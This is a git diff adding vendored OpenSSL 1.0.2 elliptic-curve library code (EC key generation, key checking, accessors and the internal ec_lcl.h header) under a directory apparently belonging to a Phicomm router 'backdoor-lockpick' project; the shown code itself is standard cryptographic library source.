+        if (!BN_rand_range(priv_key, order))
+            goto err;
+    while (BN_is_zero(priv_key)) ;
+
+    if (eckey->pub_key == NULL) {
+        pub_key = EC_POINT_new(eckey->group);
+        if (pub_key == NULL)
+            goto err;
+    } else
+        pub_key = eckey->pub_key;
+
+    if (!EC_POINT_mul(eckey->group, pub_key, priv_key, NULL, NULL, ctx))
+        goto err;
+
+    eckey->priv_key = priv_key;
+    eckey->pub_key = pub_key;
+
+    ok = 1;
+
+ err:
+    if (order)
+        BN_free(order);
+    if (pub_key != NULL && eckey->pub_key == NULL)
+        EC_POINT_free(pub_key);
+    if (priv_key != NULL && eckey->priv_key == NULL)
+        BN_free(priv_key);
+    if (ctx != NULL)
+        BN_CTX_free(ctx);
+    return (ok);
+}
+
+int EC_KEY_check_key(const EC_KEY *eckey)
+{
+    int ok = 0;
+    BN_CTX *ctx = NULL;
+    const BIGNUM *order = NULL;
+    EC_POINT *point = NULL;
+
+    if (!eckey || !eckey->group || !eckey->pub_key) {
+        ECerr(EC_F_EC_KEY_CHECK_KEY, ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+
+    if (EC_POINT_is_at_infinity(eckey->group, eckey->pub_key)) {
+        ECerr(EC_F_EC_KEY_CHECK_KEY, EC_R_POINT_AT_INFINITY);
+        goto err;
+    }
+
+    if ((ctx = BN_CTX_new()) == NULL)
+        goto err;
+    if ((point = EC_POINT_new(eckey->group)) == NULL)
+        goto err;
+
+    /* testing whether the pub_key is on the elliptic curve */
+    if (!EC_POINT_is_on_curve(eckey->group, eckey->pub_key, ctx)) {
+        ECerr(EC_F_EC_KEY_CHECK_KEY, EC_R_POINT_IS_NOT_ON_CURVE);
+        goto err;
+    }
+    /* testing whether pub_key * order is the point at infinity */
+    order = &eckey->group->order;
+    if (BN_is_zero(order)) {
+        ECerr(EC_F_EC_KEY_CHECK_KEY, EC_R_INVALID_GROUP_ORDER);
+        goto err;
+    }
+    if (!EC_POINT_mul(eckey->group, point, NULL, eckey->pub_key, order, ctx)) {
+        ECerr(EC_F_EC_KEY_CHECK_KEY, ERR_R_EC_LIB);
+        goto err;
+    }
+    if (!EC_POINT_is_at_infinity(eckey->group, point)) {
+        ECerr(EC_F_EC_KEY_CHECK_KEY, EC_R_WRONG_ORDER);
+        goto err;
+    }
+    /*
+     * in case the priv_key is present : check if generator * priv_key ==
+     * pub_key
+     */
+    if (eckey->priv_key) {
+        if (BN_cmp(eckey->priv_key, order) >= 0) {
+            ECerr(EC_F_EC_KEY_CHECK_KEY, EC_R_WRONG_ORDER);
+            goto err;
+        }
+        if (!EC_POINT_mul(eckey->group, point, eckey->priv_key,
+                          NULL, NULL, ctx)) {
+            ECerr(EC_F_EC_KEY_CHECK_KEY, ERR_R_EC_LIB);
+            goto err;
+        }
+        if (EC_POINT_cmp(eckey->group, point, eckey->pub_key, ctx) != 0) {
+            ECerr(EC_F_EC_KEY_CHECK_KEY, EC_R_INVALID_PRIVATE_KEY);
+            goto err;
+        }
+    }
+    ok = 1;
+ err:
+    if (ctx != NULL)
+        BN_CTX_free(ctx);
+    if (point != NULL)
+        EC_POINT_free(point);
+    return (ok);
+}
+
+int EC_KEY_set_public_key_affine_coordinates(EC_KEY *key, BIGNUM *x,
+                                             BIGNUM *y)
+{
+    BN_CTX *ctx = NULL;
+    BIGNUM *tx, *ty;
+    EC_POINT *point = NULL;
+    int ok = 0, tmp_nid, is_char_two = 0;
+
+    if (!key || !key->group || !x || !y) {
+        ECerr(EC_F_EC_KEY_SET_PUBLIC_KEY_AFFINE_COORDINATES,
+              ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+    ctx = BN_CTX_new();
+    if (!ctx)
+        goto err;
+
+    point = EC_POINT_new(key->group);
+
+    if (!point)
+        goto err;
+
+    tmp_nid = EC_METHOD_get_field_type(EC_GROUP_method_of(key->group));
+
+    if (tmp_nid == NID_X9_62_characteristic_two_field)
+        is_char_two = 1;
+
+    tx = BN_CTX_get(ctx);
+    ty = BN_CTX_get(ctx);
+#ifndef OPENSSL_NO_EC2M
+    if (is_char_two) {
+        if (!EC_POINT_set_affine_coordinates_GF2m(key->group, point,
+                                                  x, y, ctx))
+            goto err;
+        if (!EC_POINT_get_affine_coordinates_GF2m(key->group, point,
+                                                  tx, ty, ctx))
+            goto err;
+    } else
+#endif
+    {
+        if (!EC_POINT_set_affine_coordinates_GFp(key->group, point,
+                                                 x, y, ctx))
+            goto err;
+        if (!EC_POINT_get_affine_coordinates_GFp(key->group, point,
+                                                 tx, ty, ctx))
+            goto err;
+    }
+    /*
+     * Check if retrieved coordinates match originals: if not values are out
+     * of range.
+     */
+    if (BN_cmp(x, tx) || BN_cmp(y, ty)) {
+        ECerr(EC_F_EC_KEY_SET_PUBLIC_KEY_AFFINE_COORDINATES,
+              EC_R_COORDINATES_OUT_OF_RANGE);
+        goto err;
+    }
+
+    if (!EC_KEY_set_public_key(key, point))
+        goto err;
+
+    if (EC_KEY_check_key(key) == 0)
+        goto err;
+
+    ok = 1;
+
+ err:
+    if (ctx)
+        BN_CTX_free(ctx);
+    if (point)
+        EC_POINT_free(point);
+    return ok;
+
+}
+
+const EC_GROUP *EC_KEY_get0_group(const EC_KEY *key)
+{
+    return key->group;
+}
+
+int EC_KEY_set_group(EC_KEY *key, const EC_GROUP *group)
+{
+    if (key->group != NULL)
+        EC_GROUP_free(key->group);
+    key->group = EC_GROUP_dup(group);
+    return (key->group == NULL) ? 0 : 1;
+}
+
+const BIGNUM *EC_KEY_get0_private_key(const EC_KEY *key)
+{
+    return key->priv_key;
+}
+
+int EC_KEY_set_private_key(EC_KEY *key, const BIGNUM *priv_key)
+{
+    if (key->priv_key)
+        BN_clear_free(key->priv_key);
+    key->priv_key = BN_dup(priv_key);
+    return (key->priv_key == NULL) ? 0 : 1;
+}
+
+const EC_POINT *EC_KEY_get0_public_key(const EC_KEY *key)
+{
+    return key->pub_key;
+}
+
+int EC_KEY_set_public_key(EC_KEY *key, const EC_POINT *pub_key)
+{
+    if (key->pub_key != NULL)
+        EC_POINT_free(key->pub_key);
+    key->pub_key = EC_POINT_dup(pub_key, key->group);
+    return (key->pub_key == NULL) ? 0 : 1;
+}
+
+unsigned int EC_KEY_get_enc_flags(const EC_KEY *key)
+{
+    return key->enc_flag;
+}
+
+void EC_KEY_set_enc_flags(EC_KEY *key, unsigned int flags)
+{
+    key->enc_flag = flags;
+}
+
+point_conversion_form_t EC_KEY_get_conv_form(const EC_KEY *key)
+{
+    return key->conv_form;
+}
+
+void EC_KEY_set_conv_form(EC_KEY *key, point_conversion_form_t cform)
+{
+    key->conv_form = cform;
+    if (key->group != NULL)
+        EC_GROUP_set_point_conversion_form(key->group, cform);
+}
+
+void *EC_KEY_get_key_method_data(EC_KEY *key,
+                                 void *(*dup_func) (void *),
+                                 void (*free_func) (void *),
+                                 void (*clear_free_func) (void *))
+{
+    void *ret;
+
+    CRYPTO_r_lock(CRYPTO_LOCK_EC);
+    ret =
+        EC_EX_DATA_get_data(key->method_data, dup_func, free_func,
+                            clear_free_func);
+    CRYPTO_r_unlock(CRYPTO_LOCK_EC);
+
+    return ret;
+}
+
+void *EC_KEY_insert_key_method_data(EC_KEY *key, void *data,
+                                    void *(*dup_func) (void *),
+                                    void (*free_func) (void *),
+                                    void (*clear_free_func) (void *))
+{
+    EC_EXTRA_DATA *ex_data;
+
+    CRYPTO_w_lock(CRYPTO_LOCK_EC);
+    ex_data =
+        EC_EX_DATA_get_data(key->method_data, dup_func, free_func,
+                            clear_free_func);
+    if (ex_data == NULL)
+        EC_EX_DATA_set_data(&key->method_data, data, dup_func, free_func,
+                            clear_free_func);
+    CRYPTO_w_unlock(CRYPTO_LOCK_EC);
+
+    return ex_data;
+}
+
+void EC_KEY_set_asn1_flag(EC_KEY *key, int flag)
+{
+    if (key->group != NULL)
+        EC_GROUP_set_asn1_flag(key->group, flag);
+}
+
+int EC_KEY_precompute_mult(EC_KEY *key, BN_CTX *ctx)
+{
+    if (key->group == NULL)
+        return 0;
+    return EC_GROUP_precompute_mult(key->group, ctx);
+}
+
+int EC_KEY_get_flags(const EC_KEY *key)
+{
+    return key->flags;
+}
+
+void EC_KEY_set_flags(EC_KEY *key, int flags)
+{
+    key->flags |= flags;
+}
+
+void EC_KEY_clear_flags(EC_KEY *key, int flags)
+{
+    key->flags &= ~flags;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_lcl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_lcl.h
new file mode 100644
index 0000000..697eeb5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_lcl.h
@@ -0,0 +1,576 @@
+/* crypto/ec/ec_lcl.h */
+/*
+ * Originally written by Bodo Moeller for the OpenSSL project.
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2010 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ *
+ * Portions of the attached software ("Contribution") are developed by
+ * SUN MICROSYSTEMS, INC., and are contributed to the OpenSSL project.
+ *
+ * The Contribution is licensed pursuant to the OpenSSL open source
+ * license provided above.
+ *
+ * The elliptic curve binary polynomial software is originally written by
+ * Sheueling Chang Shantz and Douglas Stebila of Sun Microsystems Laboratories.
+ *
+ */
+
+#include <stdlib.h>
+
+#include <openssl/obj_mac.h>
+#include <openssl/ec.h>
+#include <openssl/bn.h>
+
+#if defined(__SUNPRO_C)
+# if __SUNPRO_C >= 0x520
+#  pragma error_messages (off,E_ARRAY_OF_INCOMPLETE_NONAME,E_ARRAY_OF_INCOMPLETE)
+# endif
+#endif
+
+/* Use default functions for poin2oct, oct2point and compressed coordinates */
+#define EC_FLAGS_DEFAULT_OCT    0x1
+
+/*
+ * Structure details are not part of the exported interface, so all this may
+ * change in future versions.
+ */
+
+struct ec_method_st {
+    /* Various method flags */
+    int flags;
+    /* used by EC_METHOD_get_field_type: */
+    int field_type;             /* a NID */
+    /*
+     * used by EC_GROUP_new, EC_GROUP_free, EC_GROUP_clear_free,
+     * EC_GROUP_copy:
+     */
+    int (*group_init) (EC_GROUP *);
+    void (*group_finish) (EC_GROUP *);
+    void (*group_clear_finish) (EC_GROUP *);
+    int (*group_copy) (EC_GROUP *, const EC_GROUP *);
+    /* used by EC_GROUP_set_curve_GFp, EC_GROUP_get_curve_GFp, */
+    /* EC_GROUP_set_curve_GF2m, and EC_GROUP_get_curve_GF2m: */
+    int (*group_set_curve) (EC_GROUP *, const BIGNUM *p, const BIGNUM *a,
+                            const BIGNUM *b, BN_CTX *);
+    int (*group_get_curve) (const EC_GROUP *, BIGNUM *p, BIGNUM *a, BIGNUM *b,
+                            BN_CTX *);
+    /* used by EC_GROUP_get_degree: */
+    int (*group_get_degree) (const EC_GROUP *);
+    /* used by EC_GROUP_check: */
+    int (*group_check_discriminant) (const EC_GROUP *, BN_CTX *);
+    /*
+     * used by EC_POINT_new, EC_POINT_free, EC_POINT_clear_free,
+     * EC_POINT_copy:
+     */
+    int (*point_init) (EC_POINT *);
+    void (*point_finish) (EC_POINT *);
+    void (*point_clear_finish) (EC_POINT *);
+    int (*point_copy) (EC_POINT *, const EC_POINT *);
+    /*-
+     * used by EC_POINT_set_to_infinity,
+     * EC_POINT_set_Jprojective_coordinates_GFp,
+     * EC_POINT_get_Jprojective_coordinates_GFp,
+     * EC_POINT_set_affine_coordinates_GFp,     ..._GF2m,
+     * EC_POINT_get_affine_coordinates_GFp,     ..._GF2m,
+     * EC_POINT_set_compressed_coordinates_GFp, ..._GF2m:
+     */
+    int (*point_set_to_infinity) (const EC_GROUP *, EC_POINT *);
+    int (*point_set_Jprojective_coordinates_GFp) (const EC_GROUP *,
+                                                  EC_POINT *, const BIGNUM *x,
+                                                  const BIGNUM *y,
+                                                  const BIGNUM *z, BN_CTX *);
+    int (*point_get_Jprojective_coordinates_GFp) (const EC_GROUP *,
+                                                  const EC_POINT *, BIGNUM *x,
+                                                  BIGNUM *y, BIGNUM *z,
+                                                  BN_CTX *);
+    int (*point_set_affine_coordinates) (const EC_GROUP *, EC_POINT *,
+                                         const BIGNUM *x, const BIGNUM *y,
+                                         BN_CTX *);
+    int (*point_get_affine_coordinates) (const EC_GROUP *, const EC_POINT *,
+                                         BIGNUM *x, BIGNUM *y, BN_CTX *);
+    int (*point_set_compressed_coordinates) (const EC_GROUP *, EC_POINT *,
+                                             const BIGNUM *x, int y_bit,
+                                             BN_CTX *);
+    /* used by EC_POINT_point2oct, EC_POINT_oct2point: */
+    size_t (*point2oct) (const EC_GROUP *, const EC_POINT *,
+                         point_conversion_form_t form, unsigned char *buf,
+                         size_t len, BN_CTX *);
+    int (*oct2point) (const EC_GROUP *, EC_POINT *, const unsigned char *buf,
+                      size_t len, BN_CTX *);
+    /* used by EC_POINT_add, EC_POINT_dbl, ECP_POINT_invert: */
+    int (*add) (const EC_GROUP *, EC_POINT *r, const EC_POINT *a,
+                const EC_POINT *b, BN_CTX *);
+    int (*dbl) (const EC_GROUP *, EC_POINT *r, const EC_POINT *a, BN_CTX *);
+    int (*invert) (const EC_GROUP *, EC_POINT *, BN_CTX *);
+    /*
+     * used by EC_POINT_is_at_infinity, EC_POINT_is_on_curve, EC_POINT_cmp:
+     */
+    int (*is_at_infinity) (const EC_GROUP *, const EC_POINT *);
+    int (*is_on_curve) (const EC_GROUP *, const EC_POINT *, BN_CTX *);
+    int (*point_cmp) (const EC_GROUP *, const EC_POINT *a, const EC_POINT *b,
+                      BN_CTX *);
+    /* used by EC_POINT_make_affine, EC_POINTs_make_affine: */
+    int (*make_affine) (const EC_GROUP *, EC_POINT *, BN_CTX *);
+    int (*points_make_affine) (const EC_GROUP *, size_t num, EC_POINT *[],
+                               BN_CTX *);
+    /*
+     * used by EC_POINTs_mul, EC_POINT_mul, EC_POINT_precompute_mult,
+     * EC_POINT_have_precompute_mult (default implementations are used if the
+     * 'mul' pointer is 0):
+     */
+    int (*mul) (const EC_GROUP *group, EC_POINT *r, const BIGNUM *scalar,
+                size_t num, const EC_POINT *points[], const BIGNUM *scalars[],
+                BN_CTX *);
+    int (*precompute_mult) (EC_GROUP *group, BN_CTX *);
+    int (*have_precompute_mult) (const EC_GROUP *group);
+    /* internal functions */
+    /*
+     * 'field_mul', 'field_sqr', and 'field_div' can be used by 'add' and
+     * 'dbl' so that the same implementations of point operations can be used
+     * with different optimized implementations of expensive field
+     * operations:
+     */
+    int (*field_mul) (const EC_GROUP *, BIGNUM *r, const BIGNUM *a,
+                      const BIGNUM *b, BN_CTX *);
+    int (*field_sqr) (const EC_GROUP *, BIGNUM *r, const BIGNUM *a, BN_CTX *);
+    int (*field_div) (const EC_GROUP *, BIGNUM *r, const BIGNUM *a,
+                      const BIGNUM *b, BN_CTX *);
+    /* e.g. to Montgomery */
+    int (*field_encode) (const EC_GROUP *, BIGNUM *r, const BIGNUM *a,
+                         BN_CTX *);
+    /* e.g. from Montgomery */
+    int (*field_decode) (const EC_GROUP *, BIGNUM *r, const BIGNUM *a,
+                         BN_CTX *);
+    int (*field_set_to_one) (const EC_GROUP *, BIGNUM *r, BN_CTX *);
+} /* EC_METHOD */ ;
+
+typedef struct ec_extra_data_st {
+    struct ec_extra_data_st *next;
+    void *data;
+    void *(*dup_func) (void *);
+    void (*free_func) (void *);
+    void (*clear_free_func) (void *);
+} EC_EXTRA_DATA;                /* used in EC_GROUP */
+
+struct ec_group_st {
+    const EC_METHOD *meth;
+    EC_POINT *generator;        /* optional */
+    BIGNUM order, cofactor;
+    int curve_name;             /* optional NID for named curve */
+    int asn1_flag;              /* flag to control the asn1 encoding */
+    /*
+     * Kludge: upper bit of ans1_flag is used to denote structure
+     * version. Is set, then last field is present. This is done
+     * for interoperation with FIPS code.
+     */
+#define EC_GROUP_ASN1_FLAG_MASK 0x7fffffff
+#define EC_GROUP_VERSION(p) (p->asn1_flag&~EC_GROUP_ASN1_FLAG_MASK)
+    point_conversion_form_t asn1_form;
+    unsigned char *seed;        /* optional seed for parameters (appears in
+                                 * ASN1) */
+    size_t seed_len;
+    EC_EXTRA_DATA *extra_data;  /* linked list */
+    /*
+     * The following members are handled by the method functions, even if
+     * they appear generic
+     */
+    /*
+     * Field specification. For curves over GF(p), this is the modulus; for
+     * curves over GF(2^m), this is the irreducible polynomial defining the
+     * field.
+     */
+    BIGNUM field;
+    /*
+     * Field specification for curves over GF(2^m). The irreducible f(t) is
+     * then of the form: t^poly[0] + t^poly[1] + ... + t^poly[k] where m =
+     * poly[0] > poly[1] > ... > poly[k] = 0. The array is terminated with
+     * poly[k+1]=-1. All elliptic curve irreducibles have at most 5 non-zero
+     * terms.
+     */
+    int poly[6];
+    /*
+     * Curve coefficients. (Here the assumption is that BIGNUMs can be used
+     * or abused for all kinds of fields, not just GF(p).) For characteristic
+     * > 3, the curve is defined by a Weierstrass equation of the form y^2 =
+     * x^3 + a*x + b. For characteristic 2, the curve is defined by an
+     * equation of the form y^2 + x*y = x^3 + a*x^2 + b.
+     */
+    BIGNUM a, b;
+    /* enable optimized point arithmetics for special case */
+    int a_is_minus3;
+    /* method-specific (e.g., Montgomery structure) */
+    void *field_data1;
+    /* method-specific */
+    void *field_data2;
+    /* method-specific */
+    int (*field_mod_func) (BIGNUM *, const BIGNUM *, const BIGNUM *,
+                           BN_CTX *);
+    BN_MONT_CTX *mont_data;     /* data for ECDSA inverse */
+} /* EC_GROUP */ ;
+
+struct ec_key_st {
+    int version;
+    EC_GROUP *group;
+    EC_POINT *pub_key;
+    BIGNUM *priv_key;
+    unsigned int enc_flag;
+    point_conversion_form_t conv_form;
+    int references;
+    int flags;
+    EC_EXTRA_DATA *method_data;
+} /* EC_KEY */ ;
+
+/*
+ * Basically a 'mixin' for extra data, but available for EC_GROUPs/EC_KEYs
+ * only (with visibility limited to 'package' level for now). We use the
+ * function pointers as index for retrieval; this obviates global
+ * ex_data-style index tables.
+ */
+int EC_EX_DATA_set_data(EC_EXTRA_DATA **, void *data,
+                        void *(*dup_func) (void *),
+                        void (*free_func) (void *),
+                        void (*clear_free_func) (void *));
+void *EC_EX_DATA_get_data(const EC_EXTRA_DATA *, void *(*dup_func) (void *),
+                          void (*free_func) (void *),
+                          void (*clear_free_func) (void *));
+void EC_EX_DATA_free_data(EC_EXTRA_DATA **, void *(*dup_func) (void *),
+                          void (*free_func) (void *),
+                          void (*clear_free_func) (void *));
+void EC_EX_DATA_clear_free_data(EC_EXTRA_DATA **, void *(*dup_func) (void *),
+                                void (*free_func) (void *),
+                                void (*clear_free_func) (void *));
+void EC_EX_DATA_free_all_data(EC_EXTRA_DATA **);
+void EC_EX_DATA_clear_free_all_data(EC_EXTRA_DATA **);
+
+struct ec_point_st {
+    const EC_METHOD *meth;
+    /*
+     * All members except 'meth' are handled by the method functions, even if
+     * they appear generic
+     */
+    BIGNUM X;
+    BIGNUM Y;
+    BIGNUM Z;                   /* Jacobian projective coordinates: (X, Y, Z)
+                                 * represents (X/Z^2, Y/Z^3) if Z != 0 */
+    int Z_is_one;               /* enable optimized point arithmetics for
+                                 * special case */
+} /* EC_POINT */ ;
+
+/*
+ * method functions in ec_mult.c (ec_lib.c uses these as defaults if
+ * group->method->mul is 0)
+ */
+int ec_wNAF_mul(const EC_GROUP *group, EC_POINT *r, const BIGNUM *scalar,
+                size_t num, const EC_POINT *points[], const BIGNUM *scalars[],
+                BN_CTX *);
+int ec_wNAF_precompute_mult(EC_GROUP *group, BN_CTX *);
+int ec_wNAF_have_precompute_mult(const EC_GROUP *group);
+
+/* method functions in ecp_smpl.c */
+int ec_GFp_simple_group_init(EC_GROUP *);
+void ec_GFp_simple_group_finish(EC_GROUP *);
+void ec_GFp_simple_group_clear_finish(EC_GROUP *);
+int ec_GFp_simple_group_copy(EC_GROUP *, const EC_GROUP *);
+int ec_GFp_simple_group_set_curve(EC_GROUP *, const BIGNUM *p,
+                                  const BIGNUM *a, const BIGNUM *b, BN_CTX *);
+int ec_GFp_simple_group_get_curve(const EC_GROUP *, BIGNUM *p, BIGNUM *a,
+                                  BIGNUM *b, BN_CTX *);
+int ec_GFp_simple_group_get_degree(const EC_GROUP *);
+int ec_GFp_simple_group_check_discriminant(const EC_GROUP *, BN_CTX *);
+int ec_GFp_simple_point_init(EC_POINT *);
+void ec_GFp_simple_point_finish(EC_POINT *);
+void ec_GFp_simple_point_clear_finish(EC_POINT *);
+int ec_GFp_simple_point_copy(EC_POINT *, const EC_POINT *);
+int ec_GFp_simple_point_set_to_infinity(const EC_GROUP *, EC_POINT *);
+int ec_GFp_simple_set_Jprojective_coordinates_GFp(const EC_GROUP *,
+                                                  EC_POINT *, const BIGNUM *x,
+                                                  const BIGNUM *y,
+                                                  const BIGNUM *z, BN_CTX *);
+int ec_GFp_simple_get_Jprojective_coordinates_GFp(const EC_GROUP *,
+                                                  const EC_POINT *, BIGNUM *x,
+                                                  BIGNUM *y, BIGNUM *z,
+                                                  BN_CTX *);
+int ec_GFp_simple_point_set_affine_coordinates(const EC_GROUP *, EC_POINT *,
+                                               const BIGNUM *x,
+                                               const BIGNUM *y, BN_CTX *);
+int ec_GFp_simple_point_get_affine_coordinates(const EC_GROUP *,
+                                               const EC_POINT *, BIGNUM *x,
+                                               BIGNUM *y, BN_CTX *);
+int ec_GFp_simple_set_compressed_coordinates(const EC_GROUP *, EC_POINT *,
+                                             const BIGNUM *x, int y_bit,
+                                             BN_CTX *);
+size_t ec_GFp_simple_point2oct(const EC_GROUP *, const EC_POINT *,
+                               point_conversion_form_t form,
+                               unsigned char *buf, size_t len, BN_CTX *);
+int ec_GFp_simple_oct2point(const EC_GROUP *, EC_POINT *,
+                            const unsigned char *buf, size_t len, BN_CTX *);
+int ec_GFp_simple_add(const EC_GROUP *, EC_POINT *r, const EC_POINT *a,
+                      const EC_POINT *b, BN_CTX *);
+int ec_GFp_simple_dbl(const EC_GROUP *, EC_POINT *r, const EC_POINT *a,
+                      BN_CTX *);
+int ec_GFp_simple_invert(const EC_GROUP *, EC_POINT *, BN_CTX *);
+int ec_GFp_simple_is_at_infinity(const EC_GROUP *, const EC_POINT *);
+int ec_GFp_simple_is_on_curve(const EC_GROUP *, const EC_POINT *, BN_CTX *);
+int ec_GFp_simple_cmp(const EC_GROUP *, const EC_POINT *a, const EC_POINT *b,
+                      BN_CTX *);
+int ec_GFp_simple_make_affine(const EC_GROUP *, EC_POINT *, BN_CTX *);
+int ec_GFp_simple_points_make_affine(const EC_GROUP *, size_t num,
+                                     EC_POINT *[], BN_CTX *);
+int ec_GFp_simple_field_mul(const EC_GROUP *, BIGNUM *r, const BIGNUM *a,
+                            const BIGNUM *b, BN_CTX *);
+int ec_GFp_simple_field_sqr(const EC_GROUP *, BIGNUM *r, const BIGNUM *a,
+                            BN_CTX *);
+
+/* method functions in ecp_mont.c */
+int ec_GFp_mont_group_init(EC_GROUP *);
+int ec_GFp_mont_group_set_curve(EC_GROUP *, const BIGNUM *p, const BIGNUM *a,
+                                const BIGNUM *b, BN_CTX *);
+void ec_GFp_mont_group_finish(EC_GROUP *);
+void ec_GFp_mont_group_clear_finish(EC_GROUP *);
+int ec_GFp_mont_group_copy(EC_GROUP *, const EC_GROUP *);
+int ec_GFp_mont_field_mul(const EC_GROUP *, BIGNUM *r, const BIGNUM *a,
+                          const BIGNUM *b, BN_CTX *);
+int ec_GFp_mont_field_sqr(const EC_GROUP *, BIGNUM *r, const BIGNUM *a,
+                          BN_CTX *);
+int ec_GFp_mont_field_encode(const EC_GROUP *, BIGNUM *r, const BIGNUM *a,
+                             BN_CTX *);
+int ec_GFp_mont_field_decode(const EC_GROUP *, BIGNUM *r, const BIGNUM *a,
+                             BN_CTX *);
+int ec_GFp_mont_field_set_to_one(const EC_GROUP *, BIGNUM *r, BN_CTX *);
+
+/* method functions in ecp_nist.c */
+int ec_GFp_nist_group_copy(EC_GROUP *dest, const EC_GROUP *src);
+int ec_GFp_nist_group_set_curve(EC_GROUP *, const BIGNUM *p, const BIGNUM *a,
+                                const BIGNUM *b, BN_CTX *);
+int ec_GFp_nist_field_mul(const EC_GROUP *, BIGNUM *r, const BIGNUM *a,
+                          const BIGNUM *b, BN_CTX *);
+int ec_GFp_nist_field_sqr(const EC_GROUP *, BIGNUM *r, const BIGNUM *a,
+                          BN_CTX *);
+
+/* method functions in ec2_smpl.c */
+int ec_GF2m_simple_group_init(EC_GROUP *);
+void ec_GF2m_simple_group_finish(EC_GROUP *);
+void ec_GF2m_simple_group_clear_finish(EC_GROUP *);
+int ec_GF2m_simple_group_copy(EC_GROUP *, const EC_GROUP *);
+int ec_GF2m_simple_group_set_curve(EC_GROUP *, const BIGNUM *p,
+                                   const BIGNUM *a, const BIGNUM *b,
+                                   BN_CTX *);
+int ec_GF2m_simple_group_get_curve(const EC_GROUP *, BIGNUM *p, BIGNUM *a,
+                                   BIGNUM *b, BN_CTX *);
+int ec_GF2m_simple_group_get_degree(const EC_GROUP *);
+int ec_GF2m_simple_group_check_discriminant(const EC_GROUP *, BN_CTX *);
+int ec_GF2m_simple_point_init(EC_POINT *);
+void ec_GF2m_simple_point_finish(EC_POINT *);
+void ec_GF2m_simple_point_clear_finish(EC_POINT *);
+int ec_GF2m_simple_point_copy(EC_POINT *, const EC_POINT *);
+int ec_GF2m_simple_point_set_to_infinity(const EC_GROUP *, EC_POINT *);
+int ec_GF2m_simple_point_set_affine_coordinates(const EC_GROUP *, EC_POINT *,
+                                                const BIGNUM *x,
+                                                const BIGNUM *y, BN_CTX *);
+int ec_GF2m_simple_point_get_affine_coordinates(const EC_GROUP *,
+                                                const EC_POINT *, BIGNUM *x,
+                                                BIGNUM *y, BN_CTX *);
+int ec_GF2m_simple_set_compressed_coordinates(const EC_GROUP *, EC_POINT *,
+                                              const BIGNUM *x, int y_bit,
+                                              BN_CTX *);
+size_t ec_GF2m_simple_point2oct(const EC_GROUP *, const EC_POINT *,
+                                point_conversion_form_t form,
+                                unsigned char *buf, size_t len, BN_CTX *);
+int ec_GF2m_simple_oct2point(const EC_GROUP *, EC_POINT *,
+                             const unsigned char *buf, size_t len, BN_CTX *);
+int ec_GF2m_simple_add(const EC_GROUP *, EC_POINT *r, const EC_POINT *a,
+                       const EC_POINT *b, BN_CTX *);
+int ec_GF2m_simple_dbl(const EC_GROUP *, EC_POINT *r, const EC_POINT *a,
+                       BN_CTX *);
+int ec_GF2m_simple_invert(const EC_GROUP *, EC_POINT *, BN_CTX *);
+int ec_GF2m_simple_is_at_infinity(const EC_GROUP *, const EC_POINT *);
+int ec_GF2m_simple_is_on_curve(const EC_GROUP *, const EC_POINT *, BN_CTX *);
+int ec_GF2m_simple_cmp(const EC_GROUP *, const EC_POINT *a, const EC_POINT *b,
+                       BN_CTX *);
+int ec_GF2m_simple_make_affine(const EC_GROUP *, EC_POINT *, BN_CTX *);
+int ec_GF2m_simple_points_make_affine(const EC_GROUP *, size_t num,
+                                      EC_POINT *[], BN_CTX *);
+int ec_GF2m_simple_field_mul(const EC_GROUP *, BIGNUM *r, const BIGNUM *a,
+                             const BIGNUM *b, BN_CTX *);
+int ec_GF2m_simple_field_sqr(const EC_GROUP *, BIGNUM *r, const BIGNUM *a,
+                             BN_CTX *);
